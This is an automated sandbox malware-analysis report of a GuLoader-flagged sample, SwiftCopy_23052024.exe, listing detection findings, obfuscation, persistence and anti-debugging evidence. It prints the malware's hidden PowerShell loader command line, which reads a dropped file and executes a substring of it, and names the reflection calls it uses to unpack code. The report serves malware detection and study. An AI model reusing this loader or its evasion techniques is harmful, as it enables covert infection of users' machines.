Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2185214744.0000000002793000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ore.pdbL source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb%B source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wlanext.pdbGCTL source: Tabsgivende.exe, 00000012.00000003.2301820383.00000000066AF000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2301840277.0000000022211000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000002.00000002.2198487086.0000000009E4D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tandpastaer $Varmefrontens $Amorin), (Squamaceous @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ozzy = [AppDomain]::CurrentDomain.GetAssemblies()$global:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Farvemssigt)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Friktioners, $false).DefineType($Aristokratis
Obfuscated command line found
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" Jump to behavior
Suspicious powershell command line found
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)"
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0447AA05 pushfd ; retn 0007h 2_2_0447AA2A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044794F7 push eax; ret 2_2_044794FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044794FB push eax; ret 2_2_04479502
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04479581 push ecx; ret 2_2_04479582
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04479589 push ecx; ret 2_2_0447958A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044796BB pushad ; retn 0007h 2_2_044796CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04479365 push edx; retn 0007h 2_2_0447936A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0447936F push ebx; retn 0007h 2_2_0447938A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04479335 push edx; retn 0007h 2_2_0447935A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044793CF push esp; retn 0007h 2_2_044793CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044793E5 push esi; retn 0007h 2_2_044793EA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044793EF push edi; retn 0007h 2_2_044793FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044793BB push esp; retn 0007h 2_2_044793CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04479D98 pushad ; ret 2_2_04479E4A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04479975 push ebx; ret 2_2_044799A2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044799A9 push ebx; ret 2_2_044799AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_06FEC35C push eax; ret 2_2_06FEC35D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08882E98 push cs; iretd 2_2_08882F17
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_088836C8 push ecx; retf 2_2_088836D2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_088807D3 push esp; iretd 2_2_088807EC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08882F0E push cs; iretd 2_2_08882F17
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225209AD push ecx; mov dword ptr [esp], ecx 18_2_225209B6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_016607D3 push esp; iretd 18_2_016607EC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_016636C8 push ecx; retf 18_2_016636D2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_01662F0E push cs; iretd 18_2_01662F17
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_01662E98 push cs; iretd 18_2_01662F17
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Jump to dropped file
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2256096E rdtsc 18_2_2256096E
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7598 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2169 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe API coverage: 0.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5960 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_004062F0 FindFirstFileA,FindClose, 0_2_004062F0
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_00402765 FindFirstFileA, 0_2_00402765
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004057B5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: SwiftCopy_23052024.exe, 00000000.00000002.1237405102.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Tabsgivende.exe, 00000012.00000002.2361654109.0000000006610000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2361867653.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2244185698.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2243920932.0000000006662000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SwiftCopy_23052024.exe, 00000000.00000002.1237405102.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000002.00000002.2193801394.0000000006D12000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2256096E rdtsc 18_2_2256096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_026ED244 LdrInitializeThunk,LdrInitializeThunk, 2_2_026ED244
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251A250 mov eax, dword ptr fs:[00000030h] 18_2_2251A250
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526259 mov eax, dword ptr fs:[00000030h] 18_2_22526259
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A8243 mov eax, dword ptr fs:[00000030h] 18_2_225A8243
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A8243 mov ecx, dword ptr fs:[00000030h] 18_2_225A8243
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h] 18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h] 18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h] 18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h] 18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h] 18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h] 18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h] 18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h] 18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h] 18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h] 18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h] 18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h] 18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22524260 mov eax, dword ptr fs:[00000030h] 18_2_22524260
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22524260 mov eax, dword ptr fs:[00000030h] 18_2_22524260
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22524260 mov eax, dword ptr fs:[00000030h] 18_2_22524260
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251826B mov eax, dword ptr fs:[00000030h] 18_2_2251826B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251823B mov eax, dword ptr fs:[00000030h] 18_2_2251823B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A2C3 mov eax, dword ptr fs:[00000030h] 18_2_2252A2C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A2C3 mov eax, dword ptr fs:[00000030h] 18_2_2252A2C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A2C3 mov eax, dword ptr fs:[00000030h] 18_2_2252A2C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A2C3 mov eax, dword ptr fs:[00000030h] 18_2_2252A2C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A2C3 mov eax, dword ptr fs:[00000030h] 18_2_2252A2C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225302E1 mov eax, dword ptr fs:[00000030h] 18_2_225302E1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225302E1 mov eax, dword ptr fs:[00000030h] 18_2_225302E1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225302E1 mov eax, dword ptr fs:[00000030h] 18_2_225302E1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E284 mov eax, dword ptr fs:[00000030h] 18_2_2255E284
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E284 mov eax, dword ptr fs:[00000030h] 18_2_2255E284
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A0283 mov eax, dword ptr fs:[00000030h] 18_2_225A0283
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A0283 mov eax, dword ptr fs:[00000030h] 18_2_225A0283
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A0283 mov eax, dword ptr fs:[00000030h] 18_2_225A0283
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225302A0 mov eax, dword ptr fs:[00000030h] 18_2_225302A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225302A0 mov eax, dword ptr fs:[00000030h] 18_2_225302A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B62A0 mov eax, dword ptr fs:[00000030h] 18_2_225B62A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B62A0 mov ecx, dword ptr fs:[00000030h] 18_2_225B62A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B62A0 mov eax, dword ptr fs:[00000030h] 18_2_225B62A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B62A0 mov eax, dword ptr fs:[00000030h] 18_2_225B62A0
